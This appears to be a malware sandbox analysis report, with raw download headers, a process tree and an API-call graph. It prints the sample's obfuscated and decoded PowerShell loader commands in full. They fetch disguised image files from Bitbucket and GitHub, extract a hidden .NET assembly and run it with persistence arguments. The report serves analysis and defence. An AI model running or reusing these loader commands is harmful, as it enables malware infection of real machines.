                                                                                                      Location: https://bbuseruploads.s3.amazonaws.com/84b86a50-0f03-4f00-a68a-9b48f6a9ad1a/downloads/0d99d38f-9760-4bfe-b69f-138f0c1650be/agchIkI.txt?response-content-disposition=attachment%3B%20filename%3D%22agchIkI.txt%22&AWSAccessKeyId=ASIA6KOSE3BNGQDBEIEW&Signature=LcmiqQxfJCWsqR7f5%2FBgA%2FmLfew%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGcaCXVzLWVhc3QtMSJIMEYCIQCkvEaZNiJUzzSwpm6mAojC9AJaLoX0kU%2FJPCVkYw0chQIhAIoEons%2BRUzTqYeijpHGPG88tnHmj5KAOxSTK7%2BPyJj0KqcCCDAQABoMOTg0NTI1MTAxMTQ2Igy7jhdAuU9GksejFp4qhAKh3BYzpW8aypWmyP5uUBqqhpyDnxgY71GJrJTWv9IsNw42rRqC%2BXntF%2FsqDcBXi1AAZfGHedDrd0cTTo0Y267xzy8V9mCp31iPMBDr%2FMq4tto4WLyqglYMhFJuo43Y2IJCaf1ubM1j462lGSOuGBkI%2FCSlgxpFj2ujVf7aLJJSOHhn2Nn%2F1dC%2FdYaMLq6KUpxxtfC24cLCAdjLkqrJN5%2FammuzyXYtSC%2BrIlVCPSj28Krj%2BYfVl103XPiF9br%2Bv9hW6R3El%2FGc9Ss0nw48olzJawrzUs6tWUhxJktgz2%2BHXymxyddxGLgVlzEReUQKkQewD3nBe3cl%2FcGt9JbZnkdk%2FT3FnjC69IC7BjqcAWyv7xb5B4OzYgYtMrKnj%2BRHLyVyFKbWwOZy1hLKKfrqAJc8%2FWcMdTWTyPYIchCHoHcrb3Igc8DTjkE7ELPMqXWcvNdfpqFKHbQ5bq%2FC3cWg4PI86%2BHSCrqH5 [TRUNCATED]
                                                                                                      Expires: Mon, 16 Dec 2024 14:36:30 GMT
                                                                                                      Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                      X-Used-Mesh: False
                                                                                                      Vary: Accept-Language, Origin
                                                                                                      Content-Language: en
                                                                                                      X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                      X-Dc-Location: Micros-3
                                                                                                      X-Served-By: 7591e08f7aac
                                                                                                      X-Version: 448c766573cd
                                                                                                      X-Static-Version: 448c766573cd
                                                                                                      X-Request-Count: 1928
                                                                                                      X-Render-Time: 0.0749819278717041
                                                                                                      X-B3-Traceid: e87a37688f7b41caafd31e8cd3184821
                                                                                                      X-B3-Spanid: bd907e08c77b91e7
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Content-Security-Policy: base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-pa [TRUNCATED]
                                                                                                      X-Usage-Quota-Remaining: 998946.551
                                                                                                      X-Usage-Request-Cost: 1074.93
                                                                                                      X-Usage-User-Time: 0.013970
                                                                                                      X-Usage-System-Time: 0.018278
                                                                                                      X-Usage-Input-Ops: 0
                                                                                                      X-Usage-Output-Ops: 0
                                                                                                      Age: 0
                                                                                                      X-Cache: MISS
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                      Atl-Traceid: e87a37688f7b41caafd31e8cd3184821
                                                                                                      Atl-Request-Id: e87a3768-8f7b-41ca-afd3-1e8cd3184821
                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                      Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                      Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                      Server-Timing: atl-edge;dur=186,atl-edge-internal;dur=4,atl-edge-upstream;dur=183,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                      Connection: close


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:4
                                                                                                      Start time:09:36:08
                                                                                                      Start date:16/12/2024
                                                                                                      Path:C:\Users\user\Desktop\GdGXG0bnxH.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Users\user\Desktop\GdGXG0bnxH.exe"
                                                                                                      Imagebase:0x7ff7e6e80000
                                                                                                      File size:163'840 bytes
                                                                                                      MD5 hash:8970EEF61BA5B0D180B01242796BAD53
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:6
                                                                                                      Start time:09:36:08
                                                                                                      Start date:16/12/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:cmd.exe /c 675c87f6bfee1.vbs
                                                                                                      Imagebase:0x7ff7d1730000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:7
                                                                                                      Start time:09:36:08
                                                                                                      Start date:16/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff75da10000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:8
                                                                                                      Start time:09:36:08
                                                                                                      Start date:16/12/2024
                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs"
                                                                                                      Imagebase:0xf40000
                                                                                                      File size:170'496 bytes
                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:9
                                                                                                      Start time:09:36:09
                                                                                                      Start date:16/12/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$EM$bwBt$G0$YQBu$GQ$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$FM$dQBi$HM$d$By$Gk$bgBn$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Cw$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$QwBv$G4$dgBl$HI$d$Bd$Do$OgBG$HI$bwBt$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$Bi$GE$cwBl$DY$N$BD$G8$bQBt$GE$bgBk$Ck$Ow$g$C$$I$$k$HQ$ZQB4$HQ$I$$9$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$Ow$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBS$GU$ZgBs$GU$YwB0$Gk$bwBu$C4$QQBz$HM$ZQBt$GI$b$B5$F0$Og$6$Ew$bwBh$GQ$K$$k$GM$bwBt$G0$YQBu$GQ$QgB5$HQ$ZQBz$Ck$Ow$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$c$By$GU$cwBz$GU$Z$BC$Hk$d$Bl$EE$cgBy$GE$eQ$g$D0$I$BH$GU$d$$t$EM$bwBt$H$$cgBl$HM$cwBl$GQ$QgB5$HQ$ZQBB$HI$cgBh$Hk$I$$t$GI$eQB0$GU$QQBy$HI$YQB5$C$$J$Bl$G4$YwBU$GU$e$B0$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$HQ$eQBw$GU$I$$9$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$LgBH$GU$d$BU$Hk$c$Bl$Cg$JwB0$GU$cwB0$H$$bwB3$GU$cgBz$Gg$ZQBs$Gw$LgBI$G8$YQBh$GE$YQBh$GE$cwBk$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$EU$bgBj$G8$Z$Bl$GQ$V$Bl$Hg$d$$g$D0$WwBD$G8$bgB2$GU$cgB0$F0$Og$6$FQ$bwBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$QgB5$HQ$ZQBz$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$G0$ZQB0$Gg$bwBk$C$$PQ$g$CQ$d$B5$H$$ZQ$u$Ec$ZQB0$E0$ZQB0$Gg$bwBk$Cg$JwBs$GY$cwBn$GU$Z$Bk$GQ$Z$Bk$GQ$Z$Bh$Cc$KQ$u$Ek$bgB2$G8$awBl$Cg$J$Bu$HU$b$Bs$Cw$I$Bb$G8$YgBq$GU$YwB0$Fs$XQBd$C$$K$$n$C$$d$B4$HQ$LgBJ$Gs$SQBo$GM$ZwBh$C8$cwBk$GE$bwBs$G4$dwBv$GQ$LwBz$GY$dwBx$GU$cQB3$C8$d$B3$HE$ZQB3$HE$ZQ$v$Gc$cgBv$C4$d$Bl$Gs$YwB1$GI$d$Bp$GI$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$TQBz$GI$dQBp$Gw$Z$$n$Cw$I$$n$D$$Jw$p$Ck$fQB9$$==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $sodigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                                      Imagebase:0x7ff741d30000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:10
                                                                                                      Start time:09:36:09
                                                                                                      Start date:16/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff75da10000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:11
                                                                                                      Start time:09:36:10
                                                                                                      Start date:16/12/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                                                                                                      Imagebase:0x7ff741d30000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:31.4%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:42.3%
                                                                                                        Total number of Nodes:928
                                                                                                        Total number of Limit Nodes:45
                                                                                                        execution_graph 2984 7ff7e6e88790 SetUnhandledExceptionFilter 2985 7ff7e6e88750 2986 7ff7e6e8875f 2985->2986 2987 7ff7e6e88782 2985->2987 2986->2987 2988 7ff7e6e8877b ?terminate@ 2986->2988 2988->2987 2901 7ff7e6e85690 2908 7ff7e6e83b40 2901->2908 2904 7ff7e6e856ba 2905 7ff7e6e856c2 WriteFile 2905->2904 2906 7ff7e6e856f9 2905->2906 2906->2904 2907 7ff7e6e85725 SendDlgItemMessageA 2906->2907 2907->2904 2909 7ff7e6e83b4c MsgWaitForMultipleObjects 2908->2909 2910 7ff7e6e83be5 2909->2910 2911 7ff7e6e83b74 PeekMessageA 2909->2911 2910->2904 2910->2905 2911->2909 2912 7ff7e6e83b99 2911->2912 2912->2909 2912->2910 2913 7ff7e6e83ba7 DispatchMessageA 2912->2913 2914 7ff7e6e83bb8 PeekMessageA 2912->2914 2913->2914 2914->2912 2915 7ff7e6e83910 2916 7ff7e6e83933 2915->2916 2917 7ff7e6e83a09 2915->2917 2916->2917 2918 7ff7e6e83948 2916->2918 2919 7ff7e6e83a11 GetDesktopWindow 2916->2919 2920 7ff7e6e83954 2917->2920 2921 7ff7e6e83b1a EndDialog 2917->2921 2923 7ff7e6e8394c 2918->2923 2924 7ff7e6e8397b 2918->2924 2938 7ff7e6e84c68 6 API calls 2919->2938 2921->2920 2923->2920 2926 7ff7e6e8395b TerminateThread 2923->2926 2924->2920 2927 7ff7e6e83985 ResetEvent 2924->2927 2926->2921 2930 7ff7e6e84dcc 24 API calls 2927->2930 2928 7ff7e6e83a9b SetWindowTextA CreateThread 2928->2920 2931 7ff7e6e83ae8 2928->2931 2929 7ff7e6e83a38 GetDlgItem SendMessageA GetDlgItem SendMessageA 2929->2928 2932 7ff7e6e839c3 2930->2932 2933 7ff7e6e84dcc 24 API calls 2931->2933 2934 7ff7e6e839e4 SetEvent 2932->2934 2937 7ff7e6e839cc SetEvent 2932->2937 2936 7ff7e6e83b07 2933->2936 2935 7ff7e6e83b40 4 API calls 2934->2935 2935->2917 2936->2917 2937->2920 2939 7ff7e6e84d3f SetWindowPos 2938->2939 2941 7ff7e6e88470 7 API calls 2939->2941 2942 7ff7e6e83a2f 2941->2942 2942->2928 2942->2929 2991 7ff7e6e880d0 2992 7ff7e6e880e2 2991->2992 2998 7ff7e6e88818 GetModuleHandleW 2992->2998 2994 7ff7e6e88149 __set_app_type 2995 7ff7e6e88186 2994->2995 2996 7ff7e6e8818f __setusermatherr 2995->2996 2997 7ff7e6e8819c 2995->2997 2996->2997 2999 7ff7e6e8882d 2998->2999 2999->2994 2066 7ff7e6e88200 2085 7ff7e6e88964 2066->2085 2070 7ff7e6e8824b 2071 7ff7e6e8825d 2070->2071 2072 7ff7e6e88277 Sleep 2070->2072 2073 7ff7e6e8826d _amsg_exit 2071->2073 2076 7ff7e6e88284 2071->2076 2072->2070 2073->2076 2074 7ff7e6e88319 _IsNonwritableInCurrentImage 2077 7ff7e6e8837d 2074->2077 2078 7ff7e6e883f8 _ismbblead 2074->2078 2075 7ff7e6e882fc _initterm 2075->2074 2076->2074 2076->2075 2083 7ff7e6e882dd 2076->2083 2089 7ff7e6e82c54 GetVersion 2077->2089 2078->2074 2081 7ff7e6e883cf 2081->2083 2084 7ff7e6e883d8 _cexit 2081->2084 2082 7ff7e6e883c7 exit 2082->2081 2084->2083 2086 7ff7e6e88990 6 API calls 2085->2086 2087 7ff7e6e88209 GetStartupInfoW 2085->2087 2088 7ff7e6e88a0f 2086->2088 2087->2070 2088->2087 2090 7ff7e6e82c7b 2089->2090 2091 7ff7e6e82cc3 2089->2091 2090->2091 2093 7ff7e6e82c7f GetModuleHandleW 2090->2093 2113 7ff7e6e82db4 2091->2113 2093->2091 2095 7ff7e6e82c97 GetProcAddress 2093->2095 2095->2091 2097 7ff7e6e82cb2 2095->2097 2096 7ff7e6e82d7f 2099 7ff7e6e82d8b CloseHandle 2096->2099 2100 7ff7e6e82d97 2096->2100 2097->2091 2099->2100 2100->2081 2100->2082 2104 7ff7e6e82d29 2104->2096 2105 7ff7e6e82d5e 2104->2105 2106 7ff7e6e82d33 2104->2106 2108 7ff7e6e82d7a 2105->2108 2109 7ff7e6e82d67 ExitWindowsEx 2105->2109 2230 7ff7e6e84dcc 2106->2230 2259 7ff7e6e81c0c GetCurrentProcess OpenProcessToken 2108->2259 2109->2096 2114 7ff7e6e88b09 2113->2114 2115 7ff7e6e82df9 memset memset 2114->2115 2267 7ff7e6e85050 FindResourceA SizeofResource 2115->2267 2118 7ff7e6e82fb5 2122 7ff7e6e84dcc 24 API calls 2118->2122 2119 7ff7e6e82e53 CreateEventA SetEvent 2120 7ff7e6e85050 7 API calls 2119->2120 2121 7ff7e6e82e92 2120->2121 2123 7ff7e6e82e96 2121->2123 2125 7ff7e6e82ed5 2121->2125 2127 7ff7e6e82fa3 2121->2127 2124 7ff7e6e82fd9 2122->2124 2129 7ff7e6e84dcc 24 API calls 2123->2129 2299 7ff7e6e88470 2124->2299 2128 7ff7e6e85050 7 API calls 2125->2128 2272 7ff7e6e870a8 2127->2272 2133 7ff7e6e82eec 2128->2133 2130 7ff7e6e82eb4 2129->2130 2130->2124 2133->2123 2135 7ff7e6e82efe CreateMutexA 2133->2135 2135->2127 2137 7ff7e6e82f22 GetLastError 2135->2137 2136 7ff7e6e82fc4 2138 7ff7e6e82fde FindResourceExA 2136->2138 2139 7ff7e6e82fcd 2136->2139 2137->2127 2140 7ff7e6e82f35 2137->2140 2142 7ff7e6e83014 2138->2142 2143 7ff7e6e82fff LoadResource 2138->2143 2307 7ff7e6e8204c 2139->2307 2144 7ff7e6e82f4a 2140->2144 2145 7ff7e6e82f62 2140->2145 2147 7ff7e6e8301d #17 2142->2147 2148 7ff7e6e83029 2142->2148 2143->2142 2146 7ff7e6e84dcc 24 API calls 2144->2146 2149 7ff7e6e84dcc 24 API calls 2145->2149 2150 7ff7e6e82f60 2146->2150 2147->2148 2148->2124 2151 7ff7e6e8303a 2148->2151 2152 7ff7e6e82f7c 2149->2152 2154 7ff7e6e82f81 CloseHandle 2150->2154 2322 7ff7e6e83bf4 GetVersionExA 2151->2322 2152->2127 2152->2154 2154->2124 2159 7ff7e6e830ec 2160 7ff7e6e83116 2159->2160 2161 7ff7e6e83141 2159->2161 2163 7ff7e6e83134 2160->2163 2436 7ff7e6e860a4 2160->2436 2456 7ff7e6e85fe4 2161->2456 2614 7ff7e6e83f74 2163->2614 2168 7ff7e6e83236 2172 7ff7e6e88470 7 API calls 2168->2172 2174 7ff7e6e82ce1 2172->2174 2173 7ff7e6e8315b GetSystemDirectoryA 2175 7ff7e6e87ba8 CharPrevA 2173->2175 2205 7ff7e6e861ec 2174->2205 2176 7ff7e6e83186 LoadLibraryA 2175->2176 2177 7ff7e6e831c9 FreeLibrary 2176->2177 2178 7ff7e6e8319f GetProcAddress 2176->2178 2180 7ff7e6e831e4 2177->2180 2181 7ff7e6e83273 SetCurrentDirectoryA 2177->2181 2178->2177 2179 7ff7e6e831ba DecryptFileA 2178->2179 2179->2177 2180->2181 2183 7ff7e6e831f0 GetWindowsDirectoryA 2180->2183 2182 7ff7e6e8320d 2181->2182 2188 7ff7e6e83291 2181->2188 